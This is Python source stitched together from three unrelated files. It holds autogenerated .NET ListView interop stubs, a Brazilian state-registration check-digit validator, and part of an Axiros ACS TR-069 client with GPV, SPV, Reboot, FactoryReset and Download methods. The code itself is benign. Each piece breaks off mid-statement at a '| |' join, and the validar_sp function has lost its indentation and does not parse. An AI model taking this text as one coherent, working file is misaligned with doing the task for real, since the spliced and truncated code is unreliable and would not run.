    Returns: A string that states the control type,the count of items in the System.Windows.Forms.ListView
    control,and the type of the first item in the System.Windows.Forms.ListView,if the count is
    not 0.
    """
    # Autogenerated .NET interop stub: the real implementation lives in the CLR.
    pass
def UpdateBounds(self, *args):
    """
    UpdateBounds(self: Control,x: int,y: int,width: int,height: int,clientWidth: int,clientHeight: int)
    Updates the bounds of the control with the specified size,location,and client size.
    x: The System.Drawing.Point.X coordinate of the control.
    y: The System.Drawing.Point.Y coordinate of the control.
    width: The System.Drawing.Size.Width of the control.
    height: The System.Drawing.Size.Height of the control.
    clientWidth: The client System.Drawing.Size.Width of the control.
    clientHeight: The client System.Drawing.Size.Height of the control.
    UpdateBounds(self: Control,x: int,y: int,width: int,height: int)
    Updates the bounds of the control with the specified size and location.
    x: The System.Drawing.Point.X coordinate of the control.
    y: The System.Drawing.Point.Y coordinate of the control.
    width: The System.Drawing.Size.Width of the control.
    height: The System.Drawing.Size.Height of the control.
    UpdateBounds(self: Control)
    Updates the bounds of the control with the current size and location.
    """
    # Autogenerated .NET interop stub covering the three CLR overloads above.
    pass
def UpdateExtendedStyles(self, *args):
    """
    UpdateExtendedStyles(self: ListView)
    Updates the extended styles applied to the list view control.
    """
    # Autogenerated .NET interop stub; implemented by the CLR.
    pass
def UpdateStyles(self, *args):
    """
    UpdateStyles(self: Control)
    Forces the assigned styles to be reapplied to the control.
    """
    # Autogenerated .NET interop stub; implemented by the CLR.
    pass
def UpdateZOrder(self, *args):
    """
    UpdateZOrder(self: Control)
    Updates the control in its parent's z-order.
    """
    # Autogenerated .NET interop stub; implemented by the CLR.
    pass
def WndProc(self, *args):
    """
    WndProc(self: ListView,m: Message) -> Message
    Overrides System.Windows.Forms.Control.WndProc(System.Windows.Forms.Message@).
    m: The Windows System.Windows.Forms.Message to process.
    """
    # Autogenerated .NET interop stub; window messages are handled by the CLR.
    pass
def __enter__(self, *args):
    """
    __enter__(self: IDisposable) -> object
    Provides the implementation of __enter__ for objects which implement IDisposable.
    """
    # Autogenerated interop stub: lets the control be used in a `with` block.
    pass
def __exit__(self, *args):
    """
    __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object)
    Provides the implementation of __exit__ for objects which implement IDisposable.
    """
    # Autogenerated interop stub: disposes the control on `with` block exit.
    pass
def __init__(self, *args):
    """
    x.__init__(...) initializes x; see x.__class__.__doc__ for signature
    """
    # Autogenerated interop stub; the CLR provides the real constructor logic.
    pass
def __str__(self, *args):
    """Return str(self); delegated to the underlying .NET control."""
    pass
# ---------------------------------------------------------------------------
# Autogenerated property stubs mirroring the .NET ListView/Control properties.
# Each property is declared with placeholder get/set/del lambdas purely so
# that tooling can see the attribute; the CLR supplies the real accessors.
# ---------------------------------------------------------------------------
Activation = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets the type of action the user must take to activate an item.
Get: Activation(self: ListView) -> ItemActivation
Set: Activation(self: ListView)=value
"""
Alignment = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets the alignment of items in the control.
Get: Alignment(self: ListView) -> ListViewAlignment
Set: Alignment(self: ListView)=value
"""
AllowColumnReorder = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets a value indicating whether the user can drag column headers to reorder columns in the control.
Get: AllowColumnReorder(self: ListView) -> bool
Set: AllowColumnReorder(self: ListView)=value
"""
AutoArrange = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets whether icons are automatically kept arranged.
Get: AutoArrange(self: ListView) -> bool
Set: AutoArrange(self: ListView)=value
"""
BackColor = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets the background color.
Get: BackColor(self: ListView) -> Color
Set: BackColor(self: ListView)=value
"""
BackgroundImageLayout = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets an System.Windows.Forms.ImageLayout value.
Get: BackgroundImageLayout(self: ListView) -> ImageLayout
Set: BackgroundImageLayout(self: ListView)=value
"""
BackgroundImageTiled = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets a value indicating whether the background image of the System.Windows.Forms.ListView should be tiled.
Get: BackgroundImageTiled(self: ListView) -> bool
Set: BackgroundImageTiled(self: ListView)=value
"""
BorderStyle = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets the border style of the control.
Get: BorderStyle(self: ListView) -> BorderStyle
Set: BorderStyle(self: ListView)=value
"""
CanEnableIme = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets a value indicating whether the System.Windows.Forms.Control.ImeMode property can be set to an active value,to enable IME support.
"""
CanRaiseEvents = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Determines if events can be raised on the control.
"""
CheckBoxes = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets a value indicating whether a check box appears next to each item in the control.
Get: CheckBoxes(self: ListView) -> bool
Set: CheckBoxes(self: ListView)=value
"""
CheckedIndices = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets the indexes of the currently checked items in the control.
Get: CheckedIndices(self: ListView) -> CheckedIndexCollection
"""
CheckedItems = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets the currently checked items in the control.
Get: CheckedItems(self: ListView) -> CheckedListViewItemCollection
"""
Columns = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets the collection of all column headers that appear in the control.
Get: Columns(self: ListView) -> ColumnHeaderCollection
"""
CreateParams = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""This property is not relevant for this class.
"""
DefaultCursor = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets the default cursor for the control.
"""
DefaultImeMode = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets the default Input Method Editor (IME) mode supported by the control.
"""
DefaultMargin = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets the space,in pixels,that is specified by default between controls.
"""
DefaultMaximumSize = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets the length and height,in pixels,that is specified as the default maximum size of a control.
"""
DefaultMinimumSize = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets the length and height,in pixels,that is specified as the default minimum size of a control.
"""
DefaultPadding = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets the internal spacing,in pixels,of the contents of a control.
"""
DefaultSize = property(lambda self: object(), lambda self, v: None, lambda self: None)
DesignMode = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets a value that indicates whether the System.ComponentModel.Component is currently in design mode.
"""
DoubleBuffered = property(lambda self: object(), lambda self, v: None, lambda self: None)
Events = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets the list of event handlers that are attached to this System.ComponentModel.Component.
"""
FocusedItem = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets the item in the control that currently has focus.
Get: FocusedItem(self: ListView) -> ListViewItem
Set: FocusedItem(self: ListView)=value
"""
FontHeight = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets the height of the font of the control.
"""
ForeColor = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets the foreground color.
Get: ForeColor(self: ListView) -> Color
Set: ForeColor(self: ListView)=value
"""
FullRowSelect = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets a value indicating whether clicking an item selects all its subitems.
Get: FullRowSelect(self: ListView) -> bool
Set: FullRowSelect(self: ListView)=value
"""
GridLines = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets a value indicating whether grid lines appear between the rows and columns containing the items and subitems in the control.
Get: GridLines(self: ListView) -> bool
Set: GridLines(self: ListView)=value
"""
Groups = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets the collection of System.Windows.Forms.ListViewGroup objects assigned to the control.
Get: Groups(self: ListView) -> ListViewGroupCollection
"""
HeaderStyle = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets the column header style.
Get: HeaderStyle(self: ListView) -> ColumnHeaderStyle
Set: HeaderStyle(self: ListView)=value
"""
HideSelection = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets a value indicating whether the selected item in the control remains highlighted when the control loses focus.
Get: HideSelection(self: ListView) -> bool
Set: HideSelection(self: ListView)=value
"""
HotTracking = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets a value indicating whether the text of an item or subitem has the appearance of a hyperlink when the mouse pointer passes over it.
Get: HotTracking(self: ListView) -> bool
Set: HotTracking(self: ListView)=value
"""
HoverSelection = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets a value indicating whether an item is automatically selected when the mouse pointer remains over the item for a few seconds.
Get: HoverSelection(self: ListView) -> bool
Set: HoverSelection(self: ListView)=value
"""
ImeModeBase = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets the IME mode of a control.
"""
InsertionMark = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets an object used to indicate the expected drop location when an item is dragged within a System.Windows.Forms.ListView control.
Get: InsertionMark(self: ListView) -> ListViewInsertionMark
"""
Items = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets a collection containing all items in the control.
Get: Items(self: ListView) -> ListViewItemCollection
"""
LabelEdit = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets a value indicating whether the user can edit the labels of items in the control.
Get: LabelEdit(self: ListView) -> bool
Set: LabelEdit(self: ListView)=value
"""
LabelWrap = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Gets or sets a value indicating whether item labels wrap when items are displayed in the control as icons.
Get: LabelWrap(self: ListView) -> bool
Set: LabelWrap(self: ListView)=value
"""
LargeImageList=property(lambda self: object(),lambda self,v: None,lambda self: | |
# coding=utf-8
# Copyright (C) 2013 <NAME> - Akretion
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
import re
# Per-state (UF) rules consumed by the generic ``validar_param``:
#   tam         - required total length of the number (after zero-padding)
#   val_tam     - number of leading digits that feed the check-digit
#                 computation (defaults to ``tam - 1``)
#   starts_with - mandatory numeric prefix (defaults to '')
#   prod        - weight vector, right-aligned to ``val_tam``
#                 (defaults to [5, 4, 3, 2, 9, 8, 7, 6, 5, 4, 3, 2])
#   div         - modulus used for the check digit (defaults to 11)
PARAMETERS = {
    'ac': {'tam': 13, 'val_tam': 11, 'starts_with': '01'},
    'al': {'tam': 9, 'starts_with': '24'},
    'am': {'tam': 9},
    'ce': {'tam': 9},
    'df': {'tam': 13, 'val_tam': 11, 'starts_with': '07'},
    'es': {'tam': 9},
    'ma': {'tam': 9, 'starts_with': '12'},
    'mt': {'tam': 11, 'prod': [3, 2, 9, 8, 7, 6, 5, 4, 3, 2]},
    'ms': {'tam': 9, 'starts_with': '28'},
    'pa': {'tam': 9, 'starts_with': '15'},
    'pb': {'tam': 9},
    'pr': {'tam': 10, 'val_tam': 8, 'prod': [3, 2, 7, 6, 5, 4, 3, 2]},
    'pi': {'tam': 9},
    'rj': {'tam': 8, 'prod': [2, 7, 6, 5, 4, 3, 2]},
    'rn': {'tam': 10, 'val_tam': 9, 'prod': [10, 9, 8, 7, 6, 5, 4, 3, 2]},
    'rs': {'tam': 10},
    'rr': {'tam': 9, 'starts_with': '24', 'prod': [1, 2, 3, 4, 5, 6, 7, 8],
           'div': 9},
    'sc': {'tam': 9},
    'se': {'tam': 9},
    'to': {'tam': 9, 'prod': [9, 8, 7, 6, 5, 4, 3, 2]}
}
def validar(uf, inscr_est):
    """Validate a state registration number (Inscrição Estadual).

    Dispatches to a dedicated ``validar_<uf>`` function when this module
    defines one; otherwise falls back to the table-driven
    ``validar_param``.

    :param uf: two-letter state code
    :param inscr_est: registration number to validate
    :return: True when valid, False otherwise
    """
    try:
        checker = globals()['validar_%s' % uf]
        ok = bool(checker(inscr_est))
    except KeyError:
        # No dedicated validator for this state: use the generic one.
        ok = bool(validar_param(uf, inscr_est))
    return ok
def validar_param(uf, inscr_est):
    """Generic, table-driven check-digit validation using ``PARAMETERS``.

    The number is zero-padded to the expected length, its non-digits are
    stripped, and the check digit(s) are recomputed from the leading
    ``val_tam`` digits with the state's weight vector; the number is valid
    when the recomputed digits match the originals.

    :param uf: two-letter state code (key into ``PARAMETERS``)
    :param inscr_est: registration number; non-digits are stripped
    :return: True when valid (or when the state is unknown), else False
    """
    if uf not in PARAMETERS:
        # No rules for this state: accept the number as-is.
        return True
    tam = PARAMETERS[uf].get('tam', 0)
    if not isinstance(tam, list):
        # Zero-pad only for fixed-length states; int(tam) would fail on a
        # list and padding is meaningless when several lengths are valid.
        inscr_est = inscr_est.strip().rjust(int(tam), '0')
    inscr_est = re.sub('[^0-9]', '', inscr_est)
    val_tam = PARAMETERS[uf].get('val_tam', tam - 1 if not isinstance(tam, list) else 0)
    if isinstance(tam, list):
        # Several valid lengths: pick the val_tam entry matching this one.
        # BUGFIX: the original called ``tam.find(...)`` but lists have no
        # ``find`` method; ``index`` raises ValueError instead of -1.
        try:
            i = tam.index(len(inscr_est))
        except ValueError:
            return False
        val_tam = val_tam[i]
    elif len(inscr_est) != tam:
        return False
    sw = PARAMETERS[uf].get('starts_with', '')
    if not inscr_est.startswith(sw):
        return False
    inscr_est_ints = [int(c) for c in inscr_est]
    nova_ie = inscr_est_ints[:val_tam]
    prod = PARAMETERS[uf].get('prod', [5, 4, 3, 2, 9, 8, 7, 6, 5, 4, 3, 2])
    prod = prod[-val_tam:]
    while len(nova_ie) < tam:
        r = sum(x * y for (x, y) in zip(nova_ie, prod)) \
            % PARAMETERS[uf].get('div', 11)
        f = 11 - r if r > 1 else 0
        # BUGFIX: the original tested ``uf not in 'rr'`` -- a substring
        # check -- where an equality comparison with the state code was
        # intended.  RR uses the raw remainder as its check digit.
        if uf != 'rr':
            nova_ie.append(f)
        else:
            nova_ie.append(r)
        prod.insert(0, prod[0] + 1)
    # Valid when the recomputed digits coincide with the original number.
    return nova_ie == inscr_est_ints
def validar_ap(inscr_est):
    """Validate an AP (Amapá) state registration number.

    AP numbers are 9 digits, start with '03', and use extra (p, d)
    constants that depend on the numeric range of the first 8 digits.

    :param inscr_est: registration number; non-digits are ignored
    :return: True when the check digit is valid, False otherwise
    """
    digits_str = re.sub('[^0-9]', '', inscr_est)
    if len(digits_str) != 9 or not digits_str.startswith('03'):
        return False
    # Range-dependent constants added to the weighted sum (p) and used as
    # the check digit when the remainder is zero (d).
    base = int(digits_str[:8])
    if base <= 3017000:
        extra, zero_digit = 5, 0
    elif base <= 3019022:
        extra, zero_digit = 9, 1
    else:
        extra, zero_digit = 0, 0
    digits = [int(c) for c in digits_str]
    body = digits[:8]
    weights = [9, 8, 7, 6, 5, 4, 3, 2]
    resto = (extra + sum(d * w for d, w in zip(body, weights))) % 11
    if resto > 1:
        check = 11 - resto
    elif resto == 1:
        check = 0
    else:
        check = zero_digit
    return body + [check] == digits
def validar_ba(inscr_est):
    """Validate a BA (Bahia) state registration number.

    Both the 8 and the 9 digit formats are accepted.  The modulus (10 or
    11) depends on one specific digit of the number, and the second check
    digit is computed before the first one.

    :param inscr_est: registration number; non-digits are ignored
    :return: True when the check digits are valid, False otherwise
    """
    digits = [int(c) for c in re.sub('[^0-9]', '', inscr_est)]
    size = len(digits)
    if size == 8:
        base_len, probe = 6, 0
    elif size == 9:
        base_len, probe = 7, 1
    else:
        return False
    candidate = digits[:base_len]
    weights = [8, 7, 6, 5, 4, 3, 2][-base_len:]
    # The probe digit decides which modulus this number uses.
    modulo = 10 if digits[probe] in (0, 1, 2, 3, 4, 5, 8) else 11
    while len(candidate) < size:
        resto = sum(d * w for d, w in zip(candidate, weights)) % modulo
        check = modulo - resto if resto > 0 else 0
        if check >= 10 and modulo == 11:
            check = 0
        if len(candidate) == base_len:
            # Last digit of the number (computed first).
            candidate.append(check)
        else:
            # First check digit is slotted in before the one above.
            candidate.insert(base_len, check)
        weights.insert(0, weights[0] + 1)
    return candidate == digits
def validar_go(inscr_est):
    """Validate a GO (Goiás) state registration number.

    GO numbers are 9 digits, start with 10, 11 or 15, and a specific
    numeric range of the first 8 digits maps remainder 1 to check digit 1
    instead of 0.

    :param inscr_est: registration number; non-digits are ignored
    :return: True when the check digit is valid, False otherwise
    """
    digits_str = re.sub('[^0-9]', '', inscr_est)
    if len(digits_str) != 9:
        return False
    if digits_str[:2] not in ('10', '11', '15'):
        return False
    base = int(digits_str[:8])
    special_digit = 1 if 10103105 <= base <= 10119997 else 0
    digits = [int(c) for c in digits_str]
    body = digits[:8]
    weights = [9, 8, 7, 6, 5, 4, 3, 2]
    resto = sum(d * w for d, w in zip(body, weights)) % 11
    if resto > 1:
        check = 11 - resto
    elif resto == 1:
        check = special_digit
    else:
        check = 0
    return body + [check] == digits
def validar_mg(inscr_est):
    """Validate an MG (Minas Gerais) state registration number (13 digits).

    The first check digit sums the *decimal digits* of the products of the
    body (with a 0 inserted after the third position) by alternating 1/2
    weights, then takes the distance to the next multiple of ten.  The
    second check digit is a conventional mod-11 digit.

    :param inscr_est: registration number; non-digits are ignored
    :return: True when both check digits are valid, False otherwise
    """
    digits = [int(c) for c in re.sub('[^0-9]', '', inscr_est)]
    if len(digits) != 13:
        return False
    body = digits[:11]
    # First check digit: pad with a 0 after position 3, multiply by the
    # alternating weights and sum every decimal digit of the products.
    padded = body[:3] + [0] + body[3:]
    weights = [1, 2] * 6
    digit_sum = sum(int(ch) for x, w in zip(padded, weights) for ch in str(x * w))
    first = (digit_sum // 10 + 1) * 10 - digit_sum
    if first >= 10:
        first = 0
    body.append(first)
    # Second check digit: plain weighted mod-11.
    weights2 = [3, 2, 11, 10, 9, 8, 7, 6, 5, 4, 3, 2]
    resto = sum(d * w for d, w in zip(body, weights2)) % 11
    body.append(11 - resto if resto > 1 else 0)
    return body == digits
def validar_pe(inscr_est):
    """Validate a PE (Pernambuco) state registration number.

    Accepts the modern 9-digit format (two check digits) and the legacy
    14-digit format (one check digit).

    :param inscr_est: registration number; non-digits are ignored
    :return: True when the check digit(s) are valid, False otherwise
    """
    digits = [int(c) for c in re.sub('[^0-9]', '', inscr_est)]
    size = len(digits)
    if size == 9:
        # Two mod-11 check digits computed from the first 7 digits.
        candidate = digits[:7]
        weights = [8, 7, 6, 5, 4, 3, 2]
        while len(candidate) < 9:
            resto = sum(d * w for d, w in zip(candidate, weights)) % 11
            candidate.append(11 - resto if resto > 1 else 0)
            weights.insert(0, 9)
    elif size == 14:
        # Single check digit over the first 13 digits.
        candidate = digits[:13]
        weights = [5, 4, 3, 2, 1, 9, 8, 7, 6, 5, 4, 3, 2]
        resto = sum(d * w for d, w in zip(candidate, weights)) % 11
        check = 11 - resto
        if check > 10:
            check -= 10
        candidate.append(check)
    else:
        return False
    return candidate == digits
def validar_ro(inscr_est):
    """Validate a RO (Rondônia) state registration number.

    Accepts the legacy 9-digit format (first three digits are ignored by
    the checksum) and the current 14-digit format.

    :param inscr_est: registration number; non-digits are ignored
    :return: True when the check digit is valid, False otherwise
    """
    def _check_digit(body, weights):
        # Weighted mod-11 digit; values above 9 wrap back into 0-9.
        resto = sum(d * w for d, w in zip(body, weights)) % 11
        digit = 11 - resto
        return digit - 10 if digit > 9 else digit

    digits = [int(c) for c in re.sub('[^0-9]', '', inscr_est)]
    if len(digits) == 9:
        # The leading 3 digits do not take part in the checksum.
        body = digits[3:8]
        candidate = digits[:3] + body + [_check_digit(body, [6, 5, 4, 3, 2])]
    elif len(digits) == 14:
        body = digits[:13]
        candidate = body + [
            _check_digit(body, [6, 5, 4, 3, 2, 9, 8, 7, 6, 5, 4, 3, 2])]
    else:
        return False
    return candidate == digits
def validar_sp(inscr_est):
def gera_digito_sp(nova_ie, prod):
r = sum([x * y for (x, y) in zip(nova_ie, prod)]) % 11
if r < 10:
return r
elif r == 10:
return 0
else:
return 1
# Industriais e comerciais
if inscr_est[0] != 'P':
inscr_est = re.sub('[^0-9]', '', inscr_est)
# verificando o tamanho da inscrição | |
string
:returns: list of dictionary with key, value, type indicating the DelObject
:rtype: string
"""
if self.cpeid is None:
self.cpeid = self.dev.board._cpeid
p, cmd, cpe_id = self._build_input_structs(self.cpeid,
param,
action="DO")
# get raw soap response
with self.client.settings(raw_response=True):
response = self.client.service.DeleteObject(p, cmd, cpe_id)
return AxirosACS._parse_soap_response(response)
def Read_Log_Message(self, cpeid, wait=8):
    """Read ACS log messages.

    :param cpeid: the serial number of the modem through which ACS communication happens.
    :type cpeid: string
    :param wait: the number of tries to be done if we are not getting proper ACS response, defaults to 8
    :type wait: integer, optional
    :returns: ticket response on ACS (log messages), or None when no "200" code was seen
    :rtype: dictionary
    """
    CommandOptionsTypeStruct_type = self.client.get_type(
        "ns0:CommandOptionsForCPELogStruct")
    CommandOptionsTypeStruct_data = CommandOptionsTypeStruct_type()
    CPEIdentifierClassStruct_type = self.client.get_type(
        "ns0:CPEIdentifierClassStruct")
    CPEIdentifierClassStruct_data = CPEIdentifierClassStruct_type(
        cpeid=cpeid)
    # get raw soap response (parsing error with zeep)
    with self.client.settings(raw_response=True):
        response = self.client.service.GetLogMessagesOfCPE(
            CommandOptionsTypeStruct_data, CPEIdentifierClassStruct_data)
    # NOTE(review): the SOAP call above is issued only once; this loop
    # re-parses the same payload up to `wait` times -- confirm whether the
    # intent was to re-issue the request on every retry.
    for _ in range(wait):
        time.sleep(1)
        root = ElementTree.fromstring(response.content)
        # Grab the first <code> element of the reply.
        # NOTE(review): `value` stays unbound (NameError) if the reply
        # contains no <code> element at all.
        for value in root.iter("code"):
            break
        if value.text != "200":
            continue
        # Collect (timestamp, message) pairs as log_msg1..log_msgN.
        dict_value1 = {}
        num = 1
        for key, value in zip(root.iter("ts"), root.iter("message")):
            dict_value = {}
            dict_value["time"] = key.text
            dict_value["msg"] = value.text
            dict_value1["log_msg" + str(num)] = dict_value
            num += 1
        return dict_value1
    return None
def Del_Log_Message(self, cpeid, wait=8):
    """Delete ACS log messages.

    :param cpeid: the serial number of the modem through which ACS communication happens.
    :type cpeid: string
    :param wait: the number of tries to be done if we are not getting proper ACS response, defaults to 8
    :type wait: integer, optional
    :returns: True on a "200" response code, or None
    :rtype: Boolean
    """
    CPEIdentifierClassStruct_type = self.client.get_type(
        "ns0:CPEIdentifierClassStruct")
    CPEIdentifierClassStruct_data = CPEIdentifierClassStruct_type(
        cpeid=cpeid)
    # get raw soap response (parsing error with zeep)
    with self.client.settings(raw_response=True):
        response = self.client.service.DeleteLogMessagesOfCPE(
            CPEIdentifierClassStruct_data)
    # NOTE(review): the SOAP call above is issued only once; this loop
    # re-parses the same payload up to `wait` times -- confirm whether the
    # intent was to re-issue the request on every retry.
    for _ in range(wait):
        time.sleep(1)
        root = ElementTree.fromstring(response.content)
        # Grab the first <code> element of the reply.
        # NOTE(review): `value` stays unbound (NameError) if the reply
        # contains no <code> element at all.
        for value in root.iter("code"):
            break
        if value.text == "200":
            return True
        else:
            continue
    return None
@tcp_dump
def GPV(self, param):
    """Get value from CM by ACS for a single given parameter key path synchronously.

    :param param: path to the key that assigned value will be retrieved
    :return: value as a dictionary
    :raises HTTPError: when the ACS fails with anything other than HTTP 507,
        or keeps answering 507 after the retry
    """
    # TO DO: ideally this should come off the environment helper
    if self.cpeid is None:
        self.cpeid = self.dev.board._cpeid
    p, cmd, cpe_id = self._build_input_structs(self.cpeid,
                                               param,
                                               action="GPV")
    # Retry once when the ACS answers HTTP 507 (overloaded, e.g. while a
    # DOS-attack mitigation is active); any other error is raised at once.
    val = 0
    while val <= 1:
        try:
            # raw response requested (zeep fails to parse this reply)
            with self.client.settings(raw_response=True):
                response = self.client.service.GetParameterValues(
                    p, cmd, cpe_id)
            return AxirosACS._parse_soap_response(response)
        except HTTPError as e:
            if "507" not in str(e):
                raise (e)
            else:
                # adding 10 sec timeout
                warnings.warn(
                    "Ten seconds of timeout is added to compensate DOS attack."
                )
                self.expect(pexpect.TIMEOUT, timeout=10)
                if val == 1:
                    # second 507 in a row: give up
                    raise (e)
            val += 1
@tcp_dump
def SPV(self, param_value):
    """Modify the value of one or more CPE Parameters.

    It can take a single k,v pair or a list of k,v pairs.

    :param param_value: dictionary that contains the path to the key and
        the value to be set. E.g. {'Device.WiFi.AccessPoint.1.AC.1.Alias':'mok_1'}
    :return: status of the SPV as int (0/1)
    :raises TR069ResponseError: if the status is not (0/1)
    :raises HTTPError: when the ACS fails with anything other than HTTP 507,
        or keeps answering 507 after the retry
    """
    # TO DO: ideally this should come off the environment helper
    if self.cpeid is None:
        self.cpeid = self.dev.board._cpeid
    p, cmd, cpe_id = self._build_input_structs(self.cpeid,
                                               param_value,
                                               action="SPV")
    # Retry once when the ACS answers HTTP 507 (overloaded, e.g. while a
    # DOS-attack mitigation is active); any other error is raised at once.
    val = 0
    while val <= 1:
        try:
            with self.client.settings(raw_response=True):
                response = self.client.service.SetParameterValues(
                    p, cmd, cpe_id)
            result = AxirosACS._parse_soap_response(response)
            break
        except HTTPError as e:
            if "507" not in str(e):
                raise (e)
            else:
                # adding 10 sec timeout
                warnings.warn(
                    "Ten seconds of timeout is added to compensate DOS attack."
                )
                self.expect(pexpect.TIMEOUT, timeout=10)
                if val == 1:
                    # second 507 in a row: give up
                    raise (e)
            val += 1
    # A successful SPV must report status 0 or 1; anything else is an error.
    status = int(result[0]["value"])
    if status not in [0, 1]:
        raise TR069ResponseError("SPV Invalid status: " + str(status))
    return status
@tcp_dump
def GPN(self, param, next_level):
    """Discover the parameters accessible on a particular CPE.

    Wraps the ACS ``GetParameterNames`` SOAP call.

    :param param: parameter (object path) to be discovered
    :type param: string
    :param next_level: when True, only the immediate children are listed
    :type next_level: boolean
    :return: value as a dictionary
    """
    # TO DO: ideally this should come off the environment helper
    if self.cpeid is None:
        self.cpeid = self.dev.board._cpeid
    params, options, identifier = self._build_input_structs(
        self.cpeid, param, action="GPN", next_level=next_level)
    # Raw response requested because zeep cannot parse this reply.
    with self.client.settings(raw_response=True):
        raw = self.client.service.GetParameterNames(
            params, options, identifier)
    return AxirosACS._parse_soap_response(raw)
@tcp_dump
def FactoryReset(self):
    """Execute the FactoryReset RPC.

    Only reports whether the reset request was initiated; waiting for the
    device to reboot is left to the caller.

    :return: parsed factory reset response
    """
    if self.cpeid is None:
        self.cpeid = self.dev.board._cpeid
    cmd_options = self._get_cmd_data(Sync=True, Lifetime=20)
    cpe_identifier = self._get_class_data(cpeid=self.cpeid)
    with self.client.settings(raw_response=True):
        raw = self.client.service.FactoryReset(
            CommandOptions=cmd_options,
            CPEIdentifier=cpe_identifier,
        )
    return AxirosACS._parse_soap_response(raw)
def connectivity_check(self, cpeid):
    """Check the connectivity between the ACS and the DUT by requesting
    the DUT to perform a schedule inform.

    NOTE: the scope of this method is only to verify that the ACS and the
    DUT can communicate with each other.

    :param cpeid: the id to use for the ping
    :type cpeid: string
    :return: True for a successful ScheduleInform, False otherwise
    """
    saved_cpeid = self.cpeid
    self.cpeid = cpeid
    ok = True
    try:
        self.ScheduleInform(DelaySeconds=1)
    except Exception as exc:
        # Any failure at all means the two ends could not communicate.
        print(exc)
        print(f"connectivity_check failed for {cpeid}")
        ok = False
    self.cpeid = saved_cpeid
    return ok
@tcp_dump
def ScheduleInform(self, CommandKey="Test", DelaySeconds=20):
    """Execute the ScheduleInform RPC.

    :param CommandKey: the string parameter passed to ScheduleInform
    :type CommandKey: string
    :param DelaySeconds: delay before the inform, in seconds
    :type DelaySeconds: integer
    :return: parsed ScheduleInform response
    """
    if self.cpeid is None:
        self.cpeid = self.dev.board._cpeid
    params, options, identifier = self._build_input_structs(
        self.cpeid, [CommandKey, DelaySeconds], action="SI")
    with self.client.settings(raw_response=True):
        raw = self.client.service.ScheduleInform(
            CommandOptions=options,
            CPEIdentifier=identifier,
            Parameters=params)
    return AxirosACS._parse_soap_response(raw)
@tcp_dump
def Reboot(self, CommandKey="Reboot Test"):
    """Execute the Reboot RPC.

    Only reports whether the reboot request was initiated.

    :param CommandKey: the string parameter passed to the Reboot RPC
    :type CommandKey: string
    :return: parsed Reboot response
    """
    if self.cpeid is None:
        self.cpeid = self.dev.board._cpeid
    params, options, identifier = self._build_input_structs(
        self.cpeid, CommandKey, action="REBOOT")
    with self.client.settings(raw_response=True):
        raw = self.client.service.Reboot(
            CommandOptions=options,
            CPEIdentifier=identifier,
            Parameters=params)
    return AxirosACS._parse_soap_response(raw)
@tcp_dump
def GetRPCMethods(self):
    """Execute the GetRPCMethods RPC.

    :return: parsed GetRPCMethods response listing the supported functions
    """
    if self.cpeid is None:
        self.cpeid = self.dev.board._cpeid
    cmd_options = self._get_cmd_data(Sync=True, Lifetime=20)
    cpe_identifier = self._get_class_data(cpeid=self.cpeid)
    with self.client.settings(raw_response=True):
        raw = self.client.service.GetRPCMethods(
            CommandOptions=cmd_options,
            CPEIdentifier=cpe_identifier,
        )
    return AxirosACS._parse_soap_response(raw)
@tcp_dump
def Download(
    self,
    URL,
    FileType="1 Firmware Upgrade Image",
    TargetFileName="",
    FileSize=200,
    Username="",
    Password="",
    CommandKey="",
    DelaySeconds=10,
    SuccessURL="",
    FailureURL="",
):
    """Execute the Download RPC.

    :param URL: URL to download file
    :type URL: string
    :param FileType: one of the following 6 values only:
        ["1 Firmware Upgrade Image", "2 Web Content",
        "3 Vendor Configuration File", "4 Tone File",
        "5 Ringer File", "6 Stored Firmware Image"]
    :type FileType: string
    :param TargetFileName: target file name to download through the RPC
    :type TargetFileName: string
    :param FileSize: the size of the file to download, in bytes
    :type FileSize: integer
    :param Username: user to authenticate with the file server. Default=""
    :type Username: string
    :param Password: password to authenticate with the file server. Default=""
    :type Password: string
    :param CommandKey: the string parameter passed in the Download API
    :type CommandKey: string
    :param DelaySeconds: delay in seconds before the download
    :type DelaySeconds: integer
    :param SuccessURL: URL to access in case the Download API execution succeeded
    :type SuccessURL: string
